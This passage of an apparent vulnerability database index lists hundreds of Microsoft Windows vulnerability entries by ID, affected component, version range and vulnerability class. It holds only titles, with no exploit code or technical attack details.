Runtime unknown vulnerability [172880] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP Driver denial of service [172877] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP information disclosure [172875] Microsoft Windows 8.1 up to Server 2019 Hyper-V unknown vulnerability [172874] Microsoft Windows 7 SP1 up to Server 2019 Network File System unknown vulnerability [171012] Microsoft Windows 10 20H2 up to Server 2019 NAT denial of service [171009] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V unknown vulnerability [171000] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170999] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170998] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170997] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170996] Microsoft Windows Server 20H2 up to Server 2019 DNS Server code injection [170995] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170994] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170990] Microsoft Windows Admin Center unknown vulnerability [170981] Microsoft Windows 7 SP1 up to Server 2019 Remote Access API privileges management [170979] Microsoft Windows 10 20H2 up to Server 2019 OpenType Font Parser code injection [170978] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [170907] Microsoft Windows 10 20H2 up to Server 2019 Application Virtualization code injection [170436] Microsoft Windows 8.1 up to Server 2019 Extended Protection for Authentication improper authentication [169530] Microsoft Windows 7 SP1 up to Server 2019 Trust Verification API denial of service [169529] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169528] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169527] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP denial of service [169526] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call information disclosure [169525] Microsoft Windows 7 SP1 up to Server 2019 Local Spooler unknown vulnerability [169524] Microsoft Windows 10 20H2 up to Server 2019 Microsoft.PowerShell.Utility Module protection mechanism [169521] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Network File System denial of service [169509] Microsoft Windows 7 SP1 up to Server 2019 Address Book unknown vulnerability [169502] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169501] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169499] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [169498] Microsoft Windows 10 up to Server 2019 unknown vulnerability [169497] Microsoft Windows 10 Version 1809 for 32-bit Systems Codecs Library unknown vulnerability [169487] Microsoft Windows 10 up to Server 2019 Graphics unknown vulnerability [167703] Microsoft Windows 7 SP1 up to Server 2019 Update Stack privileges management [167700] Microsoft Windows 10 up to Server 2019 RDP authorization [167699] Microsoft Windows 7 SP1 up to Server 2019 RDP Core unknown vulnerability [167687] Microsoft Windows 7 SP1 up to Server 2019 Graphics information disclosure [167686] Microsoft Windows 7 SP1 up to Server 2019 GDI+ information disclosure [167685] Microsoft Windows 7 SP1 up to Server 2019 Fax Compose Form privileges management [167680] Microsoft Windows 7 SP1 up to Server 2019 CryptoAPI denial of service [167655] Microsoft Windows 8.1 up to Server 2019 NTLM unknown vulnerability [167651] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [167638] Microsoft Windows 7 SP1 up to Server 2019 DTV-DVD Video Decoder unknown vulnerability [167637] Microsoft Windows 8.1/10/10 1607/Server 2012 R2/Server 2016 Hyper-V denial of service [167636] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V denial of service [167633] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [160963] Microsoft Windows up to Server 2019 Projected Filesystem privilege escalation [160951] Microsoft Windows up to Server 2019 Kernel memory corruption [160950] Microsoft OneDrive on Windows privilege escalation [160949] Microsoft OneDrive on Windows privilege escalation [160948] Microsoft OneDrive on Windows privilege escalation [160947] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [160946] Microsoft Windows up to Server 2019 TLS weak encryption [160944] Microsoft Windows up to Server 2019 Kernel Improper Initialization [160943] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [160942] Microsoft Windows up to Server 2019 Kernel information disclosure [160940] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160939] Microsoft Windows up to Server 2004 InstallService privilege escalation [160936] Microsoft Windows up to Server 2019 Microsoft COM for Windows privilege escalation [160932] Microsoft Windows up to Server 2019 CloudExperienceHost privilege escalation [160930] Microsoft Windows up to Server 2019 fdSSDP.dll privilege escalation [160925] Microsoft Windows up to Server 2019 DirectX privilege escalation [160924] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160923] Microsoft Windows up to Server 2019 GDI information disclosure [160922] Microsoft Windows up to Server 2019 Win32k information disclosure [160921] Microsoft Windows up to Server 2019 Win32k privilege escalation [160920] Microsoft Windows up to Server 2019 DNS denial of service [160912] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160911] Microsoft Windows up to Server 2004 StartTileData.dll privilege escalation [160910] Microsoft Windows up to Server 2019 Win32k.sys privilege escalation [160909] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160908] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160907] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160906] Microsoft Windows up to Server 2019 Language Pack Installer privilege escalation [160905] Microsoft Windows up to Server 2004 StartTileData.dll information disclosure [160904] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [160903] Microsoft Windows 10 2004 Shell Infrastructure privilege escalation [160902] Microsoft Windows up to Server 2019 GDI Dynamically-Managed Code Resources [160901] Microsoft Windows up to Server 2019 Graphics Component Dynamically-Managed Code Resources [160900] Microsoft Windows up to Server 2019 Graphics Component memory corruption [160899] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160898] Microsoft Windows up to Server 2019 DirectX privilege escalation [160895] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160894] Microsoft Windows up to Server 2019 Routing Utilities denial of service [160892] Microsoft Windows up to Server 2019 Kernel information disclosure [160891] Microsoft Windows up to Server 2019 DHCP Server information disclosure [160890] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [160889] Microsoft Windows up to Server 2019 Group Policy privilege escalation [160886] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [160883] Microsoft Windows up to Server 2019 Kernel information disclosure [160882] Microsoft Windows up to Server 2019 Graphics Component information disclosure [160881] Microsoft Windows up to Server 2019 State Repository Service information disclosure [160880] Microsoft Windows up to Server 2019 Function Discovery SSDP Provider privilege escalation [160879] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [160876] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160874] Microsoft Windows up to Server 2019 Shell Infrastructure memory corruption [160873] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160871] Microsoft Windows up to Server 2019 NTFS privilege escalation [160870] Microsoft Windows up to Server 2019 Active Directory Federation Service 2FA weak authentication [160869] Microsoft Windows up to Server 2019 DNS privilege escalation [160868] Microsoft Windows 10 2004/Server 2004 Projected Filesystem privilege escalation [160866] Microsoft Windows up to Server 2019 Cryptographic Catalog Service privilege escalation [160865] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160861] Microsoft Windows up to Server 2019 RSoP Service Application privilege escalation [160855] Microsoft Windows up to Server 2019 Media Audio Decoder memory corruption [160853] Microsoft Windows up to Server 2019 Media Audio Decoder privilege escalation [160849] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160848] Microsoft Windows up to Server 2019 GDI+ memory corruption [160847] Microsoft Windows up to Server 2019 memory corruption [160843] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160841] Microsoft Windows up to Server 2019 Camera Codec Pack memory corruption [160840] Microsoft Windows up to Server 2019 Microsoft COM for Windows memory corruption [160839] Microsoft Windows up to Server 2019 Text Service Module memory corruption [159610] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159608] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159604] Microsoft Windows up to Server 2019 Storage Service privilege escalation [159601] Microsoft Windows up to Server 2019 Speech Shell privilege escalation [159600] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [159597] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159595] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159594] Microsoft Windows up to Server 2019 Windows Runtime memory corruption [159593] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159592] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159591] Microsoft Windows up to Server 2019 Work Folder Service memory corruption [159590] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159589] Microsoft Windows up to Server 2019 State Repository Service information disclosure [159588] Microsoft Windows up to Server 2019 CDP User memory corruption [159587] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159585] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [159584] Microsoft Windows up to Server 2019 WaasMedic Service information disclosure [159583] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159582] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [159581] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159580] Microsoft Windows Remote Desktop Gateway privilege escalation [159579] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159574] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159573] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159572] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159571] Microsoft Windows up to Server 2019 UPnP Device Host memory corruption [159570] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159568] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159567] Microsoft Windows up to Server 2019 GDI memory corruption [159566] Microsoft Windows up to Server 2019 Remote Access memory corruption [159564] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [159563] Microsoft Windows up to Server 2019 Custom Protocol Engine memory corruption [159562] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159561] Microsoft Windows up to Server 2019 Kernel information disclosure [159560] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159558] Microsoft Windows up to Server 2019 Kernel privilege escalation [159557] Microsoft Windows up to Server 2019 Font Driver Host memory corruption [159556] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159555] Microsoft Windows up to Server 2019 Backup Service privilege escalation [159554] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159553] Microsoft Windows up to Server 2019 Telephony Server privilege escalation [159552] Microsoft Windows up to Server 2019 CDP User memory corruption [159550] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159548] Microsoft Windows up to Server 2019 Backup Engine privilege escalation [159545] Microsoft Windows up to Server 2019 GDI privilege escalation [159543] Microsoft Windows up to Server 2019 Kernel memory corruption [159542] Microsoft Windows up to Server 2019 Hard Link privilege escalation [159541] Microsoft Windows up to Server 2019 Remote Access memory corruption [159540] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159539] Microsoft Windows up to Server 2019 Radio Manager API memory corruption [159537] Microsoft Windows up to Server 2019 Accounts Control memory corruption [159534] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159531] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159530] Microsoft Windows up to Server 2019 Media Foundation information disclosure [159529] Microsoft Windows up to Server 2019 Network Connection Broker privilege escalation [159528] Microsoft Windows up to Server 2019 Ancillary Function Driver for WinSock privilege escalation [159526] Microsoft Windows up to Server 2019 Public Account Pictures Folder privilege escalation [159524] Microsoft Windows up to Server 2019 Win32k information disclosure [159523] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159522] Microsoft Windows up to Server 2019 DirectWrite information disclosure [159521] Microsoft Windows up to Server 2019 SSDP Provider privilege escalation [159518] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159517] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159513] Microsoft Windows up to Server 2019 DirectX privilege escalation [159512] Microsoft Windows up to Server 2019 Kernel privilege escalation [159509] Microsoft Windows 10 1909/10 2004 Codecs Library memory corruption [159504] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159503] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159500] Microsoft Windows up to Server 2004 Codecs Library memory corruption [159499] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159497] Microsoft Windows up to Server 2019 Media Audio Codec memory corruption [159496] Microsoft Windows up to 10 2004 Codecs Library memory corruption [159495] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159494] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159433] Microsoft Windows net use weak authentication [159426] Microsoft Windows VCF Card privilege escalation [159425] Microsoft Windows Group File privilege escalation [158019] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157995] Microsoft Windows up to Server 2019 WalletService information disclosure [157993] Microsoft Windows up to Server 2019 WalletService privilege escalation [157991] Microsoft Windows up to Server 2019 Update Stack privilege escalation [157990] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [157989] Microsoft Windows up to Server 2019 Delivery Optimization Service privilege escalation [157988] Microsoft Windows 10 2004/Server 2004 Subsystem for Linux privilege escalation [157986] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157985] Microsoft Windows up to Server 2019 Profile Service privilege escalation [157984] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157983] Microsoft Windows up to Server 2019 Kernel privilege escalation [157981] Microsoft Windows up to Server 2019 Kernel information disclosure [157979] Microsoft Windows up to Server 2019 Resource Policy information disclosure [157978] Microsoft Windows up to Server 2019 Kernel information disclosure [157977] Microsoft Windows up to Server 2019 Kernel memory corruption [157975] Microsoft Windows up to Server 2019 ALPC privilege escalation [157973] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157972] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157971] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157970] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157969] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157968] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157963] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157960] Microsoft Windows up to Server 2019 Diagnostics Hub privilege escalation [157957] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [157956] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service information disclosure [157955] Microsoft Windows up to Server 2019 Agent Activation Runtime information disclosure [157952] Microsoft Windows up to Server 2019 USO Core Worker privilege escalation [157951] Microsoft Windows up to Server 2019 Storage Services privilege escalation [157950] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157949] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157948] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157946] Microsoft Windows up to Server 2019 lnk File privilege escalation [157945] Microsoft Windows up to Server 2019 Error Reporting information disclosure [157944] Microsoft Windows iSCSI Target Service privilege escalation [157943] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157942] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157941] Microsoft Windows up to Server 2019 Remote Desktop Client memory corruption [157939] Microsoft Windows up to Server 2019 Picker Platform privilege escalation [157938] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157937] Microsoft Windows up to Server 2019 Windows Print Workflow Service privilege escalation [157936] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157935] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157934] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [157933] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157930] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157925] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [157924] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157923] Microsoft Windows up to Server 2019 Network Connections Service privilege escalation [157922] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157921] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157920] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [157919] Microsoft Windows up to Server 2019 Mobile Device Management information disclosure [157918] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [157916] Microsoft Windows up to Server 2019 Windows Address Book privilege escalation [157913] Microsoft OneDrive on Windows privilege escalation [157895] Microsoft Windows Defender MpSigStub.exe privilege escalation [157894] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157893] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157892] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157889] Microsoft Windows up to Server 2019 Imaging information disclosure [157888] Microsoft Windows up to Server 2019 Graphics Origin Validation Error [157887] Microsoft Windows up to Server 2019 DirectWrite memory corruption [157886] Microsoft Windows up to Server 2019 Graphics Component memory corruption [157885] Microsoft Windows up to Server 2019 GDI+ memory corruption [157884] Microsoft Windows up to Server 2019 Font Library privilege escalation [157883] Microsoft Windows up to Server 2019 Graphics Component information disclosure [157882] Microsoft Windows up to Server 2019 GDI information disclosure [157881] Microsoft Windows up to Server 2004 Font Driver Host memory corruption [157509] Microsoft Windows up to Server 2019 Codecs Library memory corruption [157508] Microsoft Windows up to Server 2019 Codecs Library memory corruption [156422] Microsoft Windows 10 2004/Server 2004 SMBv3 denial of service [156421] Microsoft Windows up to Server 2004 SMBv3 information disclosure [156420] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [156419] Microsoft Windows up to Server 2019 LNK privilege escalation [156418] Microsoft Windows up to Server 2019 CAB File privilege escalation [156417] Microsoft Windows up to Server 2019 OLE Automation privilege escalation [156415] Microsoft Windows up to Server 2019 Media Foundation information disclosure [156414] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156413] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156412] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156410] Microsoft Windows up to Server 2004 Windows Runtime privilege escalation [156409] Microsoft Windows up to Server 2019 Kernel privilege escalation [156408] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156407] Microsoft Windows up to Server 2019 Kernel privilege escalation [156406] Microsoft Windows up to Server 2019 Kernel privilege escalation [156404] Microsoft Windows up to Server 2019 Kernel privilege escalation [156403] Microsoft Windows up to Server 2019 Kernel privilege escalation [156402] Microsoft Windows up to Server 2019 Win32k privilege escalation [156401] Microsoft Windows up to Server 2004 Kernel privilege escalation [156399] Microsoft Windows up to Server 2004 Kernel privilege escalation [156398] Microsoft Windows up to Server 2019 Win32k privilege escalation [156397] Microsoft Windows up to Server 2019 Kernel privilege escalation [156396] Microsoft Windows Windows Installer privilege escalation [156395] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156394] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156393] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156386] Microsoft Windows up to Server 2004 GDI+ memory corruption [156385] Microsoft Windows up to Server 2019 Windows Runtime information disclosure [156384] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156382] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [156381] Microsoft Windows up to Server 2004 Kernel privilege escalation [156380] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [156378] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156377] Microsoft Windows up to Server 2019 Registry privilege escalation [156376] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [156375] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [156374] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156373] Microsoft Windows up to Server 2019 Kernel privilege escalation [156372] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156371] Microsoft Windows up to Server 2019 Session Manager privilege escalation [156370] Microsoft Windows 10 2004/Server 2004 Connected User Experiences/Telemetry Service privilege escalation [156369] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156368] Microsoft Windows up to Server 2019 Backup Service privilege escalation [156367] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [156365] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service denial of service [156364] Microsoft Windows up to Server 2019 Group Policy privilege escalation [156363] Microsoft Windows up to Server 2019 OpenSSH privilege escalation [156361] Microsoft Windows up to Server 2019 Win32k information disclosure [156360] Microsoft Windows up to Server 2004 Windows Service information disclosure [156359] Microsoft Windows up to Server 2019 Host Guardian Service information disclosure [156358] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156356] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [156354] Microsoft Windows up to Server 2019 Diagnostics/Feedback Settings App information disclosure [156353] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156352] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156351] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156350] Microsoft Windows up to Server 2019 Kernel privilege escalation [156349] Microsoft Windows up to Server 2004 Update Orchestrator Service privilege escalation [156348] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [156347] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156346] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156321] Microsoft Windows Defender privilege escalation [156320] Microsoft Windows Defender privilege escalation [156319] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156318] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156317] Microsoft Windows up to Server 2019 GDI privilege escalation [156316] Microsoft Windows up to Server 2019 Kernel privilege escalation [156315] Microsoft Windows up to Server 2019 GDI information disclosure [156314] Microsoft Windows up to Server 2019 Win32k privilege escalation [156313] Microsoft Windows up to Server 2019 GDI privilege escalation [156312] Microsoft Windows up to Server 2019 Graphics Component information disclosure [156311] Microsoft Windows up to Server 2019 Win32k privilege escalation [156310] Microsoft Windows up to Server 2019 DirectX privilege escalation [156309] Microsoft Windows up to Server 2019 Win32k privilege escalation [156303] Microsoft Windows 10 1709/10 1803/10 1809/10 1903/Server 2004 Feedback Hub privilege escalation [156302] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156301] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156300] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [155176] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155175] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155174] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155173] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155172] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155171] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155170] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155169] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155168] Microsoft Windows up to Server 2019 GDI information disclosure [155167] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155166] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155165] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155162] Microsoft Windows Clipboard Service privilege escalation [155161] Microsoft Windows Clipboard Service privilege escalation [155160] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155158] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155157] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155156] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155155] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155154] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [155153] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155152] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Media Foundation memory corruption [155151] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155150] Microsoft Windows GDI information disclosure [155149] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155148] Microsoft Windows up to Server 2019 Win32k privilege escalation [155147] Microsoft Windows up to Server 2019 GDI privilege escalation [155146] Microsoft Windows up to Server 2019 GDI information disclosure [155145] Microsoft Windows up to Server 2019 DirectX privilege escalation [155144] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155143] Microsoft Windows up to Server 2019 Storage Service privilege escalation [155142] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [155141] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [155140] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155139] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [155138] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155137] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155136] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155135] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155134] Microsoft Windows up to Server 2019 Clipboard Service privilege escalation [155133] Microsoft Windows up to Server 2019 TLS denial of service [155132] Microsoft Windows up to Server 2019 CSRSS information disclosure [155131] Microsoft Windows up to Server 2019 Kernel privilege escalation [155130] Microsoft Windows up to Server 2019 Task Scheduler weak authentication [155129] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [155127] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155126] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155115] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155114] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155112] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155111] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155110] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155109] Microsoft Windows up to Server 2019 Printer Service privilege escalation [155108] Microsoft Windows up to Server 2019 privilege escalation [155107] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [155106] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155105] Microsoft Windows up to Server 2019 memory corruption [155104] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [155103] Microsoft Windows up to Server 2019 information disclosure [155100] Microsoft Windows up to Server 2019 Media Service privilege escalation [155096] Microsoft Windows up to Server 2019 Script Runtime memory corruption [155092] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [155091] Microsoft Windows up to Server 2019 Win32k privilege escalation [155090] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155089] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [155087] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155086] Microsoft Windows up to Server 2019 Block Level Backup Engine Service privilege escalation [155084] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [155080] Microsoft Windows up to Server 2019 Graphics Component memory corruption [155079] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155078] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155077] Microsoft Windows up to Server 2019 Color Management ICM32.dll memory corruption [155072] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153289] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [153286] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153284] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153281] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153280] Microsoft Windows up to Server 2019 Push Notification Service information disclosure [153279] Microsoft Windows up to Server 2019 User-Mode Power Service privilege escalation [153278] Microsoft Windows up to Server 2019 Update Client privilege escalation [153277] Microsoft Windows up to Server 2019 System Assessment Tool privilege escalation [153275] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153274] Microsoft Windows up to Server 2019 Kernel information disclosure [153273] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153272] Microsoft Windows up to Server 2019 Kernel privilege escalation [153270] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153269] Microsoft Windows up to Server 2019 Kernel privilege escalation [153268] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153266] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153265] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153264] Microsoft Windows up to Server 2019 DNS denial of service [153263] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153261] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153260] Microsoft Windows Graphics Component information disclosure [153259] Microsoft Windows up to Server 2019 Update Stack privilege escalation [153257] Microsoft Windows up to Server 2019 privilege escalation [153256] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153244] Microsoft Windows up to Server 2019 GDI+ memory corruption [153243] Microsoft Windows up to Server 2019 Win32k information disclosure [153241] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153240] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153239] Microsoft Windows up to Server 2019 Kernel information disclosure [153237] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153236] Microsoft Windows up to Server 2019 GDI information disclosure [153235] Microsoft Windows 10 1903/10 1909/Server 1903/Server 1909 Media Foundation information disclosure [153234] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153233] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153232] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153230] Microsoft Windows up to Server 2019 